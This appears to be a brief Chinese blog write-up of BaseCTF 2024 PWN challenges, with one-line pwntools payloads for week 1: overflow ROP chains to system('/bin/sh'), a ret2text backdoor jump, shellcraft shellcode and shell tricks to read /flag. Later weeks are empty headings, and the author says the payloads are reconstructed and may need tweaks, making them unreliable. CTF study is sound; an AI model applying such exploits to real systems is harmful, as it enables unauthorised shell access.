本文主要是介绍[BaseCTF 2024] 高校联合新生赛 PWN (week1-7),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
pwn这块会略写,毕竟只有有用的才需要记。
week1
我把他丢了
溢出,很小的ROP,有bin/sh和system
p.sendafter(b'\n', b'\0'*0x78+flat(pop_rdi, bin_sh, 0x40120f)
Ret2text
溢出到后门
p.send(b'\0'*0x28+flat(0x4011a9))
shellcode_level0
直接运行shellcode
p.send(asm(shellcraft.sh()))
签个到吧
略
echo
只有echo命令,我一开始不会。别人说的用<定向到变量再echo
echo `< /flag`
或
a = $(< /flag)
echo a
或
$a ;连echo都不用
彻底失去她
有system没有bin/sh需要先调用read读入/bin/sh到bss,再system(/bin/sh)
p.send(b'a'*(0xa+8)+flat(pop_rdi,0,pop_rdi,elf.bss()+0x100,pop_rdx,8,elf.plt['read'],pop_rdi,elf.bss()+0x100, elf.plt['system']))
第一周过于简单,好些没作,只是凭相像写的句子,大概意思,不一定能直接用,可能需要微调。
week2
week3
week4
这篇关于[BaseCTF 2024] 高校联合新生赛 PWN (week1-7)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!